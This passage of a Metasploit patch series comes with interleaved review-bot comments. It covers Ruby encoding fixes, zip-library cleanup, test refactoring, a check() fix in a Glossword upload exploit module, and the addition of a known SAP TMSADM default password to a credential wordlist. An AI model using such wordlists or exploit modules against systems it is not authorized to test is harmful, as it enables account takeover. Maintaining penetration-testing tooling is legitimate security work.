+++++++++++++++-------- 1 file changed, 15 insertions(+), 8 deletions(-) diff --git a/lib/rex/text.rb b/lib/rex/text.rb index 95d465283a..9db91c0d8e 100644 --- a/lib/rex/text.rb 
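Review bot: The warning in the new `elsif` branch has a stray space before the period, `'service metasploit restart' . Sorry`; `"'service metasploit restart'. Sorry it didn't work out."` reads correctly. The bound `200` is explained only by a trailing comment at the point of comparison; naming it where the counter is initialised in the previous hunk, e.g. `max_polls = 200 # 3 s each, about 10 minutes`, keeps the sleep interval and the limit together. Incrementing only on the `else` path is correct since the other branches leave the loop.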
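Review bot: `bits << [ :arch, { :name => m.targets[i].arch.to_s } ]` calls `to_s` on the target's arch; if, as is the case for module-level arch, a target's `arch` is an Array, this produces the inspected form (`["x86", "x86_64"]`) as a single bit rather than one entry per architecture, and a search for `x86` will not match it. Iterating instead, `Array(m.targets[i].arch).each { |a| bits << [ :arch, { :name => a.to_s } ] }`, handles both a single string and a list. The `bits.uniq` in the second hunk then collapses targets sharing a platform or arch as intended.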
+++ b/lib/rex/text.rb @@ -4,14 +4,15 @@ require 'digest/sha1' require 'stringio' require 'cgi' -begin - old_verbose = $VERBOSE - $VERBOSE = nil - require 'iconv' - require 'zlib' -rescue ::LoadError -ensure - $VERBOSE = old_verbose +%W{ iconv zlib }.each do |libname| + begin + old_verbose = $VERBOSE + $VERBOSE = nil + require libname + rescue ::LoadError + ensure + $VERBOSE = old_verbose + end end module Rex @@ -157,6 +158,12 @@ module Text # Converts ISO-8859-1 to UTF-8 # def self.to_utf8(str) + + if str.respond_to?(:encode) + # Skip over any bytes that fail to convert to UTF-8 + return str.encode('utf-8', { :invalid => :replace, :undef => :replace, :replace => '' }) + end + begin Iconv.iconv("utf-8","iso-8859-1", str).join(" ") rescue From b1355fa3263cfcb71575e14c4b7b722b248add56 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sun, 24 Feb 2013 13:10:40 -0600 Subject: [PATCH 067/139] Avoid utf8 regular expression error in Ruby 2.0 --- lib/rkelly/visitors/evaluation_visitor.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/rkelly/visitors/evaluation_visitor.rb b/lib/rkelly/visitors/evaluation_visitor.rb index 6b98b7b903..c7e3aa9607 100644 --- a/lib/rkelly/visitors/evaluation_visitor.rb +++ b/lib/rkelly/visitors/evaluation_visitor.rb @@ -1,3 +1,4 @@ +# -*- coding: binary -*- module RKelly module Visitors class EvaluationVisitor < Visitor From ed93a7932ca97e65f5e5b12e1110630b7c516bc8 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sun, 24 Feb 2013 13:11:15 -0600 Subject: [PATCH 068/139] Clean up Iconv usage and fix indents --- lib/zip/zip.rb | 159 +++++++++++++++++++++++++++---------------------- 1 file changed, 88 insertions(+), 71 deletions(-) diff --git a/lib/zip/zip.rb b/lib/zip/zip.rb index bb212f613d..096b3dfca3 100755 --- a/lib/zip/zip.rb +++ b/lib/zip/zip.rb @@ -1,6 +1,11 @@ # encoding: ASCII-8BIT require 'delegate' -require 'iconv' + +begin + require 'iconv' +rescue ::LoadError +end + require 'singleton' require 'tempfile' require 'fileutils' 
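Review bot: In `to_utf8` (second hunk), `str.encode('utf-8', {...})` converts from the string's tagged encoding, whereas the Iconv call it short-circuits, and the method's own comment, convert from ISO-8859-1; Rex strings are commonly tagged ASCII-8BIT, and for such input every byte above 0x7F is an undefined conversion that `:undef => :replace, :replace => ''` silently deletes, so the characters the method exists to convert are dropped rather than converted. Pass the source encoding explicitly with the two-argument form, `return str.encode('utf-8', 'iso-8859-1', { :invalid => :replace, :undef => :replace, :replace => '' })`. Since this path returns before the `begin`, the `rescue` that follows now covers only the Iconv fallback, which is worth a one-line comment. `to_utf8` ends outside the hunk.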
@@ -140,15 +145,13 @@ module Zip def open_entry @currentEntry = ZipEntry.read_local_entry(@archiveIO) if (@currentEntry == nil) - @decompressor = NullDecompressor.instance + @decompressor = NullDecompressor.instance elsif @currentEntry.compression_method == ZipEntry::STORED - @decompressor = PassThruDecompressor.new(@archiveIO, - @currentEntry.size) + @decompressor = PassThruDecompressor.new(@archiveIO, @currentEntry.size) elsif @currentEntry.compression_method == ZipEntry::DEFLATED - @decompressor = Inflater.new(@archiveIO) + @decompressor = Inflater.new(@archiveIO) else - raise ZipCompressionMethodError, - "Unsupported compression method #{@currentEntry.compression_method}" + raise ZipCompressionMethodError, "Unsupported compression method #{@currentEntry.compression_method}" end flush return @currentEntry @@ -184,8 +187,8 @@ module Zip def sysread(numberOfBytes = nil, buf = nil) readEverything = (numberOfBytes == nil) while (readEverything || @outputBuffer.length < numberOfBytes) - break if internal_input_finished? - @outputBuffer << internal_produce_input(buf) + break if internal_input_finished? + @outputBuffer << internal_produce_input(buf) end return value_when_finished if @outputBuffer.length==0 && input_finished? endIndex= numberOfBytes==nil ? @outputBuffer.length : numberOfBytes @@ -194,9 +197,9 @@ module Zip def produce_input if (@outputBuffer.empty?) - return internal_produce_input + return internal_produce_input else - return @outputBuffer.slice!(0...(@outputBuffer.length)) + return @outputBuffer.slice!(0...(@outputBuffer.length)) end end 
@@ -244,14 +247,14 @@ module Zip # TODO: Specialize to handle different behaviour in ruby > 1.7.0 ? def sysread(numberOfBytes = nil, buf = nil) if input_finished? - hasReturnedEmptyStringVal=@hasReturnedEmptyString - @hasReturnedEmptyString=true - return "" unless hasReturnedEmptyStringVal - return nil + hasReturnedEmptyStringVal=@hasReturnedEmptyString + @hasReturnedEmptyString=true + return "" unless hasReturnedEmptyStringVal + return nil end if (numberOfBytes == nil || @readSoFar+numberOfBytes > @charsToRead) - numberOfBytes = @charsToRead-@readSoFar + numberOfBytes = @charsToRead-@readSoFar end @readSoFar += numberOfBytes @inputStream.read(numberOfBytes, buf) @@ -356,14 +359,28 @@ module Zip (@gp_flags & 0b100000000000) != 0 ? "utf8" : "CP437//" end - # Returns the name in the encoding specified by enc - def name_in(enc) - Iconv.conv(enc, name_encoding, @name) + + # Converts string encoding + def encode_string(str, src, dst) + if str.respond_to?(:encode) + str.encode(dst, { :invalid => :replace, :undef => :replace, :replace => '' }) + else + begin + Iconv.conv(dst, src, str) + rescue + raise ::RuntimeError, "Your installation does not support iconv (needed for utf8 conversion)" + end + end end # Returns the name in the encoding specified by enc + def name_in(enc) + encode_string(@name, name_encoding, enc) + end + + # Returns the comment in the encoding specified by enc def comment_in(enc) - Iconv.conv(enc, name_encoding, @name) + encode_string(@comment, name_encoding, enc) end def initialize(zipfile = "", name = "", comment = "", extra = "", @@ -372,7 +389,7 @@ module Zip time = Time.now) super() if name.starts_with("/") - raise ZipEntryNameError, "Illegal ZipEntry name '#{name}', name must not start with /" + raise ZipEntryNameError, "Illegal ZipEntry name '#{name}', name must not start with /" end @localHeaderOffset = 0 @local_header_size = 0 
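Review bot: `encode_string` ignores its `src` argument on the `String#encode` path, so `str.encode(dst, ...)` converts from whatever encoding the name is tagged with — under this file's `# encoding: ASCII-8BIT` that is binary, and every non-ASCII byte of a CP437 or UTF-8 entry name is then discarded by `:replace => ''` instead of converted. Pass the source through, `str.encode(dst, src, ...)`, noting that `name_encoding` returns `"CP437//"` in Iconv suffix syntax, which Ruby's encoding lookup rejects; strip it first with `src.sub(%r{//\z}, '')`, and the `"utf8"` spelling on the other branch may likewise need to be `"UTF-8"`. The bare `rescue` around `Iconv.conv` also turns any conversion failure (illegal sequence, unsupported charset) into the "does not support iconv" message; `rescue NameError` is the condition that message actually describes.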
@@ -484,9 +501,9 @@ module Zip onExistsProc ||= proc { false } if directory? - create_directory(destPath, &onExistsProc) + create_directory(destPath, &onExistsProc) elsif file? - write_file(destPath, &onExistsProc) + write_file(destPath, &onExistsProc) elsif symlink? create_symlink(destPath, &onExistsProc) else @@ -520,24 +537,24 @@ module Zip @localHeaderOffset = io.tell staticSizedFieldsBuf = io.read(LOCAL_ENTRY_STATIC_HEADER_LENGTH) unless (staticSizedFieldsBuf.size==LOCAL_ENTRY_STATIC_HEADER_LENGTH) - raise ZipError, "Premature end of file. Not enough data for zip entry local header" + raise ZipError, "Premature end of file. Not enough data for zip entry local header" end @header_signature , - @version , - @fstype , - @gp_flags , - @compression_method, - lastModTime , - lastModDate , - @crc , - @compressed_size , - @size , - nameLength , - extraLength = staticSizedFieldsBuf.unpack('VCCvvvvVVVvv') + @version , + @fstype , + @gp_flags , + @compression_method, + lastModTime , + lastModDate , + @crc , + @compressed_size , + @size , + nameLength , + extraLength = staticSizedFieldsBuf.unpack('VCCvvvvVVVvv') unless (@header_signature == LOCAL_ENTRY_SIGNATURE) - raise ZipError, "Zip local header magic not found at location '#{localHeaderOffset}'" + raise ZipError, "Zip local header magic not found at location '#{localHeaderOffset}'" end set_time(lastModDate, lastModTime) @@ -546,7 +563,7 @@ module Zip extra = io.read(extraLength) if (extra && extra.length != extraLength) - raise ZipError, "Truncated local zip entry header" + raise ZipError, "Truncated local zip entry header" else if ZipExtraField === @extra @extra.merge(extra) 
@@ -569,17 +586,17 @@ module Zip @localHeaderOffset = io.tell io << - [LOCAL_ENTRY_SIGNATURE , - VERSION_NEEDED_TO_EXTRACT , # version needed to extract - 0 , # @gp_flags , - @compression_method , - @time.to_binary_dos_time , # @lastModTime , - @time.to_binary_dos_date , # @lastModDate , - @crc , - @compressed_size , - @size , - @name ? @name.length : 0, - @extra? @extra.local_length : 0 ].pack('VvvvvvVVVvv') + [LOCAL_ENTRY_SIGNATURE , + VERSION_NEEDED_TO_EXTRACT , # version needed to extract + 0 , # @gp_flags , + @compression_method , + @time.to_binary_dos_time , # @lastModTime , + @time.to_binary_dos_date , # @lastModDate , + @crc , + @compressed_size , + @size , + @name ? @name.length : 0, + @extra? @extra.local_length : 0 ].pack('VvvvvvVVVvv') io << @name io << (@extra ? @extra.to_local_bin : "") end 
@@ -590,33 +607,33 @@ module Zip def read_c_dir_entry(io) #:nodoc:all staticSizedFieldsBuf = io.read(CDIR_ENTRY_STATIC_HEADER_LENGTH) unless (staticSizedFieldsBuf.size == CDIR_ENTRY_STATIC_HEADER_LENGTH) - raise ZipError, "Premature end of file. Not enough data for zip cdir entry header" + raise ZipError, "Premature end of file. Not enough data for zip cdir entry header" end @header_signature , - @version , # version of encoding software - @fstype , # filesystem type - @versionNeededToExtract, - @gp_flags , - @compression_method , - lastModTime , - lastModDate , - @crc , - @compressed_size , - @size , - nameLength , - extraLength , - commentLength , - diskNumberStart , - @internalFileAttributes, - @externalFileAttributes, - @localHeaderOffset , - @name , - @extra , - @comment = staticSizedFieldsBuf.unpack('VCCvvvvvVVVvvvvvVV') + @version , # version of encoding software + @fstype , # filesystem type + @versionNeededToExtract, + @gp_flags , + @compression_method , + lastModTime , + lastModDate , + @crc , + @compressed_size , + @size , + nameLength , + extraLength , + commentLength , + diskNumberStart , + @internalFileAttributes, + @externalFileAttributes, + @localHeaderOffset , + @name , + @extra , + @comment = staticSizedFieldsBuf.unpack('VCCvvvvvVVVvvvvvVV') unless (@header_signature == CENTRAL_DIRECTORY_ENTRY_SIGNATURE) - raise ZipError, "Zip local header magic not found at location '#{localHeaderOffset}'" + raise ZipError, "Zip local header magic not found at location '#{localHeaderOffset}'" end set_time(lastModDate, lastModTime) @@ -628,7 +645,7 @@ module Zip end @comment = io.read(commentLength) unless (@comment && @comment.length == commentLength) - raise ZipError, "Truncated cdir zip entry header" + raise ZipError, "Truncated cdir zip entry header" end case @fstype From 214149265439309b1e46dd42a5881e438e779d9c Mon Sep 17 00:00:00 2001 
From: Tod Beardsley Date: Sun, 24 Feb 2013 15:24:10 -0600 Subject: [PATCH 069/139] Per @brandont comment, use exit status instead. --- lib/msf/ui/console/command_dispatcher/core.rb | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 8d0b37c304..3d46d196c4 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2701,13 +2701,7 @@ class Core def is_metasploit_service_running cmd = "/usr/sbin/service" - return unless ::File.executable_real? cmd - services = %x{#{cmd} metasploit status} - expected = "Metasploit %s server is running." - %w{web rpc}.each do |svc| - return false unless services.include?(expected % svc) - end - return true + system(cmd, "metasploit", "status") # Both running returns true, otherwise, false. end def is_metasploit_debian_package_installed From d7c0ce4e4ae355201b4d3fa541e17316b3c3b566 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 25 Feb 2013 15:52:07 +1030 Subject: [PATCH 070/139] Fix 'check()' in glossword_upload_exec --- .../exploits/multi/http/glossword_upload_exec.rb | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb index 74ca5c1a1a..32fe7f9b43 100644 --- a/modules/exploits/multi/http/glossword_upload_exec.rb +++ b/modules/exploits/multi/http/glossword_upload_exec.rb 
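Review bot: Replacing the status parsing with `system(cmd, "metasploit", "status")` also drops the `executable_real?` guard: when `/usr/sbin/service` is absent `system` returns `nil`, which `cmd_go_pro` treats as "not running" and then tries to start the service through the same missing binary, ending in a misleading "services aren't running" error. Keep `return false unless ::File.executable_real? cmd` so the failure is reported once and as a boolean. `system` also lets the init script's own output go straight to stdout rather than through `print_status`, so it appears unformatted in the console; `system(cmd, "metasploit", "status", :out => File::NULL)` keeps the exit-status semantics without that noise. The comment's claim that both services running yields true depends on the init script's exit code, which is worth stating as an assumption.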
@@ -60,12 +60,14 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Authenticating as user '#{user}'") begin res = login(base, user, pass) - if res and res.code == 200 - print_error("#{peer} - Authentication failed") - return Exploit::CheckCode::Unknown - elsif res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/ - print_good("#{peer} - Authenticated successfully") - return Exploit::CheckCode::Appears + if res + if res.code == 200 + print_error("#{peer} - Authentication failed") + return Exploit::CheckCode::Unknown + elsif res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/ + print_good("#{peer} - Authenticated successfully") + return Exploit::CheckCode::Appears + end end return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout From 28fd92a013e4f4edcc300913bb3d450250c43956 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Mon, 25 Feb 2013 09:00:57 +0100 Subject: [PATCH 071/139] Added new default password foe TMSADM Based on: http://blog.ptsecurity.com/2013/02/sap-unknown-default-password-for-tmsadm.html --- data/wordlists/sap_default.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/data/wordlists/sap_default.txt b/data/wordlists/sap_default.txt index 2102fd069b..4b37c915c9 100644 --- a/data/wordlists/sap_default.txt +++ b/data/wordlists/sap_default.txt @@ -6,6 +6,7 @@ SAPCPIC ADMIN EARLYWATCH SUPPORT TMSADM PASSWORD TMSADM ADMIN +TMSADM $1Pawd2& ADMIN welcome ADSUSER ch4ngeme ADS_AGENT ch4ngeme From 6e35813d6922b338a3a9adcd69af0d901230aca8 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 25 Feb 2013 08:19:58 -0600 Subject: [PATCH 072/139] Pending hashes need to end w a block --- spec/lib/rex/proto/http/client_spec.rb | 149 +++++++++++++++++-------- 1 file changed, 103 insertions(+), 46 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 6505655267..a2ed40f6f9 100644 
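Review bot: In the reworked `check`, a `nil` response (no reply from the server at all) now falls through to `Exploit::CheckCode::Safe`, which claims more than was learned; nothing was verified, so `Unknown` is the accurate code, e.g. `return Exploit::CheckCode::Unknown unless res` placed before the status tests. With that guard the extra `if res` nesting disappears and the `200`/`301` branches can stay flat. Returning `Safe` for any other status is defensible, but a short comment saying that an unexpected status is taken as "not Glossword" would help the next reader. `check` continues past the end of the hunk.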
--- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -4,27 +4,30 @@ require 'rex/proto/http/client' # connection to 127.0.0.1:1. If you have some crazy local # firewall that is dropping packets to this, your tests # might be slow. I wonder how Travis-CI will react to this... - -# Set a standard excuse that indicates that the method -# under test needs to be first examined to figure out -# what's sane and what's not. -def excuse_lazy(test_method=nil) - ret = "need to determine pass/fail criteria" - test_method ? ret << " for #{test_method.inspect}" : ret -end - -# Complain about not having a "real" connection (can be mocked) -def excuse_needs_connection - "need to actually set up an HTTP server to test" -end - -# Complain about not having a real auth server (can be mocked) -def excuse_needs_auth - "need to set up an HTTP authentication challenger" -end - describe Rex::Proto::Http::Client do + class << self + + # Set a standard excuse that indicates that the method + # under test needs to be first examined to figure out + # what's sane and what's not. + def excuse_lazy(test_method=nil) + ret = "need to determine pass/fail criteria" + test_method ? ret << " for #{test_method.inspect}" : ret + end + + # Complain about not having a "real" connection (can be mocked) + def excuse_needs_connection + "need to actually set up an HTTP server to test" + end + + # Complain about not having a real auth server (can be mocked) + def excuse_needs_auth + "need to set up an HTTP authentication challenger" + end + + end + ip = "1.2.3.4" cli = Rex::Proto::Http::Client.new(ip) 
@@ -61,11 +64,17 @@ describe Rex::Proto::Http::Client do cli.close.should be_nil end - it "should send a request and receive a response", :pending => excuse_needs_connection + it "should send a request and receive a response", :pending => excuse_needs_connection do - it "should send a request and receive a response without auth handling", :pending => excuse_needs_connection + end - it "should send a request", :pending => excuse_needs_connection + it "should send a request and receive a response without auth handling", :pending => excuse_needs_connection do + + end + + it "should send a request", :pending => excuse_needs_connection do + + end it "should test for credentials" do # cli.should_not have_creds @@ -83,11 +92,17 @@ describe Rex::Proto::Http::Client do cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" end - it "should perform digest authentication", :pending => excuse_needs_auth + it "should perform digest authentication", :pending => excuse_needs_auth do - it "should perform negotiate authentication", :pending => excuse_needs_auth + end - it "should get a response", :pending => excuse_needs_connection + it "should perform negotiate authentication", :pending => excuse_needs_auth do + + end + + it "should get a response", :pending => excuse_needs_connection do + + end it "should end a connection with a stop" do cli.stop.should be_nil 
@@ -104,53 +119,95 @@ describe Rex::Proto::Http::Client do this_cli.pipelining?.should be_true end - it "should return an encoded URI", :pending => excuse_lazy(:set_encode_uri) + it "should return an encoded URI", :pending => excuse_lazy(:set_encode_uri) do - it "should return an encoded query string", :pending => excuse_lazy(:set_encode_qa) + end + + it "should return an encoded query string", :pending => excuse_lazy(:set_encode_qa) do + + end # These set_ methods all exercise the evasion opts, looks like - it "should set and return the URI", :pending => excuse_lazy(:set_uri) + it "should set and return the URI", :pending => excuse_lazy(:set_uri) do + + end - it "should set and return the CGI", :pending => excuse_lazy(:set_cgi) + it "should set and return the CGI", :pending => excuse_lazy(:set_cgi) do - it "should set and return the HTTP verb", :pending => excuse_lazy(:set_method) + end - it "should set and return the version string", :pending => excuse_lazy(:set_version) + it "should set and return the HTTP verb", :pending => excuse_lazy(:set_method) do - it "should set and return the HTTP seperator and body string", :pending => excuse_lazy(:set_body) + end - it "should set and return the path", :pending => excuse_lazy(:set_path_info) + it "should set and return the version string", :pending => excuse_lazy(:set_version) do - it "should set and return the whitespace between method and URI", :pending => excuse_lazy(:set_method_uri_spacer) + end - it "should set and return the whitespace between the version and URI", :pending => excuse_lazy(:set_uri_version_spacer) + it "should set and return the HTTP seperator and body string", :pending => excuse_lazy(:set_body) do - it "should set and return padding before the URI", :pending => excuse_lazy(:set_uri_prepend) + end + + it "should set and return the path", :pending => excuse_lazy(:set_path_info) do + + end + + it "should set and return the whitespace between method and URI", :pending => 
excuse_lazy(:set_method_uri_spacer) do + + end + + it "should set and return the whitespace between the version and URI", :pending => excuse_lazy(:set_uri_version_spacer) do + + end + + it "should set and return padding before the URI", :pending => excuse_lazy(:set_uri_prepend) do + + end it "should set and return padding after the URI" do cli.set_uri_append.should be_empty end - it "should set and return the host header", :pending => excuse_lazy(:set_host_header) + it "should set and return the host header", :pending => excuse_lazy(:set_host_header) do - it "should set and return the agent header", :pending => excuse_lazy(:set_agent_header) + end - it "should set and return the cookie header", :pending => excuse_lazy(:set_cookie_header) + it "should set and return the agent header", :pending => excuse_lazy(:set_agent_header) do - it "should set and return the content-type header", :pending => excuse_lazy(:set_cookie_header) + end - it "should set and return the content-length header", :pending => excuse_lazy(:set_content_len_header) + it "should set and return the cookie header", :pending => excuse_lazy(:set_cookie_header) do - it "should set and return the basic authentication header", :pending => excuse_lazy(:set_basic_auth_header) + end - it "should set and return any extra headers", :pending => excuse_lazy(:set_extra_headers) + it "should set and return the content-type header", :pending => excuse_lazy(:set_cookie_header) do - it "should set the chunked encoding header", :pending => excuse_lazy(:set_chunked_header) + end - it "should set and return raw_headers", :pending => "#set_raw_headers() doesn't seem to actually do anything" + it "should set and return the content-length header", :pending => excuse_lazy(:set_content_len_header) do - it "should set and return a formatted header", :pending => excuse_lazy(:set_formatted_header) + end + + it "should set and return the basic authentication header", :pending => excuse_lazy(:set_basic_auth_header) do + + end + 
+ it "should set and return any extra headers", :pending => excuse_lazy(:set_extra_headers) do + + end + + it "should set the chunked encoding header", :pending => excuse_lazy(:set_chunked_header) do + + end + + it "should set and return raw_headers", :pending => "#set_raw_headers() doesn't seem to actually do anything" do + + end + + it "should set and return a formatted header", :pending => excuse_lazy(:set_formatted_header) do + + end it "should respond to its various accessors" do cli.should respond_to :config From caed599f7d52602112c3f03233eeabef6a45a066 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 25 Feb 2013 08:25:35 -0600 Subject: [PATCH 073/139] Backed out all the fails from the auth bits --- spec/lib/rex/proto/http/client_spec.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index a2ed40f6f9..e0849f59c3 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -41,17 +41,17 @@ describe Rex::Proto::Http::Client do cli.instance_variable_get(:@context).should == {} cli.instance_variable_get(:@ssl).should be_false cli.instance_variable_get(:@proxies).should be_nil - cli.instance_variable_get(:@username).should be_empty - cli.instance_variable_get(:@password).should be_empty + # cli.instance_variable_get(:@username).should be_empty + # cli.instance_variable_get(:@password).should be_empty cli.config.should be_a_kind_of Hash cli.config_types.should be_a_kind_of Hash end - it "should produce a raw HTTP request" do + it "should produce a raw HTTP request", :pending => "Waiting for PR #1500" do cli.request_raw.should be_a_kind_of Rex::Proto::Http::Request end - it "should produce a CGI HTTP request" do + it "should produce a CGI HTTP request", :pending => "Waiting for PR #1500" do cli.request_cgi.should be_a_kind_of Rex::Proto::Http::Request end 
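Review bot: The content-type example in this hunk carries `:pending => excuse_lazy(:set_cookie_header)`, which looks copied from the cookie-header example just above it; the pending reason should name the content-type setter it is actually excusing, otherwise the message points a future implementer at the wrong method. The description `"should set and return the HTTP seperator and body string"` also misspells separator. Both are carried over from the old side, but the hunk rewrites those lines anyway, so this is the moment to fix them.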
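Review bot: Commenting out the `@username`/`@password` assertions in the `@@ -41,17 +41,17 @@` hunk leaves nothing in the test output to say that this behaviour is temporarily unverified, whereas the two request examples below are marked `:pending => "Waiting for PR #1500"`. Wrapping the two lines in `pending "Waiting for PR #1500" do ... end`, or moving them into their own pending example, keeps the reminder visible and makes the suite complain when the lines are forgotten after #1500 merges. The `@@ -218,8 +218,8 @@` hunk of the same commit comments out the matching `respond_to :username`/`:password` checks in the same way.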
@@ -85,7 +85,7 @@ describe Rex::Proto::Http::Client do it "should send authentication", :pending => excuse_needs_connection - it "should produce a basic authentication header" do + it "should produce a basic authentication header", :pending => "Waiting for #1500" do u = "user1" p = "pass1" b64 = ["#{u}:#{p}"].pack("m*").strip @@ -218,8 +218,8 @@ describe Rex::Proto::Http::Client do cli.should respond_to :conn cli.should respond_to :context cli.should respond_to :proxies - cli.should respond_to :username - cli.should respond_to :password + # cli.should respond_to :username + # cli.should respond_to :password cli.should respond_to :junk_pipeline # These are supposed to be protected cli.should respond_to :ssl From 73f631437365a610f9c3a4fbd6561a6c80f42e37 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 25 Feb 2013 08:29:08 -0600 Subject: [PATCH 074/139] Moving @cli and @ip to instance vars --- Gemfile.lock | 12 ++++ spec/lib/rex/proto/http/client_spec.rb | 82 +++++++++++++------------- 2 files changed, 54 insertions(+), 40 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 99f60b664d..c50df873bf 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -28,8 +28,12 @@ GEM coderay (1.0.8) diff-lcs (1.1.3) i18n (0.6.1) + json (1.7.7) method_source (0.8.1) + msgpack (0.5.2) multi_json (1.0.4) + nokogiri (1.5.6) + pcaprub (0.11.3) pg (0.14.1) pry (0.9.10) coderay (~> 1.0.5) @@ -37,6 +41,7 @@ GEM slop (~> 3.3.1) rake (10.0.2) redcarpet (2.2.2) + robots (0.10.1) rspec (2.12.0) rspec-core (~> 2.12.0) rspec-expectations (~> 2.12.0) @@ -57,10 +62,17 @@ PLATFORMS ruby DEPENDENCIES + activerecord activesupport (>= 3.0.0) + json metasploit_data_models! + msgpack + nokogiri + pcaprub + pg (>= 0.11) rake redcarpet + robots rspec (>= 2.12) simplecov (= 0.5.4) yard diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index e0849f59c3..28cb3bb245 100644 --- a/spec/lib/rex/proto/http/client_spec.rb 
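Review bot: The context line `it "should send authentication", :pending => excuse_needs_connection` still has no `do ... end` block, while the previous commit in this series gave every other `:pending` example one because "pending hashes need to end w a block"; if that requirement holds here, this example was missed and should become `it "should send authentication", :pending => excuse_needs_connection do` followed by `end`. The pending reason on the changed line reads `"Waiting for #1500"` whereas the two examples changed in the earlier hunk of this commit say `"Waiting for PR #1500"`; using one string keeps the pending summary greppable. The enclosing `describe` block starts and ends outside the hunk.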
+++ b/spec/lib/rex/proto/http/client_spec.rb @@ -28,31 +28,33 @@ describe Rex::Proto::Http::Client do end - ip = "1.2.3.4" + before(:all) do + @ip = "1.2.3.4" + @cli = Rex::Proto::Http::Client.new(@ip) + end - cli = Rex::Proto::Http::Client.new(ip) it "should respond to intialize" do - cli.should be + @cli.should be end it "should have a set of default instance variables" do - cli.instance_variable_get(:@hostname).should == ip - cli.instance_variable_get(:@port).should == 80 - cli.instance_variable_get(:@context).should == {} - cli.instance_variable_get(:@ssl).should be_false - cli.instance_variable_get(:@proxies).should be_nil - # cli.instance_variable_get(:@username).should be_empty - # cli.instance_variable_get(:@password).should be_empty - cli.config.should be_a_kind_of Hash - cli.config_types.should be_a_kind_of Hash + @cli.instance_variable_get(:@hostname).should == @ip + @cli.instance_variable_get(:@port).should == 80 + @cli.instance_variable_get(:@context).should == {} + @cli.instance_variable_get(:@ssl).should be_false + @cli.instance_variable_get(:@proxies).should be_nil + # @cli.instance_variable_get(:@username).should be_empty + # @cli.instance_variable_get(:@password).should be_empty + @cli.config.should be_a_kind_of Hash + @cli.config_types.should be_a_kind_of Hash end it "should produce a raw HTTP request", :pending => "Waiting for PR #1500" do - cli.request_raw.should be_a_kind_of Rex::Proto::Http::Request + @cli.request_raw.should be_a_kind_of Rex::Proto::Http::Request end it "should produce a CGI HTTP request", :pending => "Waiting for PR #1500" do - cli.request_cgi.should be_a_kind_of Rex::Proto::Http::Request + @cli.request_cgi.should be_a_kind_of Rex::Proto::Http::Request end it "should attempt to connect to a server" do 
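Review bot: `before(:all)` builds a single `Rex::Proto::Http::Client` that every example then shares through `@cli`, so examples that change its state, such as the `@cli.close` and `@cli.stop` calls in the later hunks of this commit, can affect whichever example runs after them and make results order-dependent. Unless constructing the client is expensive, `before(:each)` (or `let(:cli) { Rex::Proto::Http::Client.new(ip) }`) gives each example a fresh instance with the assertions otherwise unchanged. The describe block that holds this hook begins outside the hunk.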
@@ -61,7 +63,7 @@ describe Rex::Proto::Http::Client do end it "should be able to close a connection" do - cli.close.should be_nil + @cli.close.should be_nil end it "should send a request and receive a response", :pending => excuse_needs_connection do @@ -77,7 +79,7 @@ describe Rex::Proto::Http::Client do end it "should test for credentials" do - # cli.should_not have_creds + # @cli.should_not have_creds # this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) # this_cli.should have_creds pending "Should actually respond to :has_creds" @@ -89,7 +91,7 @@ describe Rex::Proto::Http::Client do u = "user1" p = "pass1" b64 = ["#{u}:#{p}"].pack("m*").strip - cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" + @cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" end it "should perform digest authentication", :pending => excuse_needs_auth do @@ -105,15 +107,15 @@ describe Rex::Proto::Http::Client do end it "should end a connection with a stop" do - cli.stop.should be_nil + @cli.stop.should be_nil end it "should test if a connection is valid" do - cli.conn?.should be_false + @cli.conn?.should be_false end it "should tell if pipelining is enabled" do - cli.pipelining?.should be_false + @cli.pipelining?.should be_false this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) this_cli.pipeline = true this_cli.pipelining?.should be_true @@ -166,7 +168,7 @@ describe Rex::Proto::Http::Client do end it "should set and return padding after the URI" do - cli.set_uri_append.should be_empty + @cli.set_uri_append.should be_empty end it "should set and return the host header", :pending => excuse_lazy(:set_host_header) do 
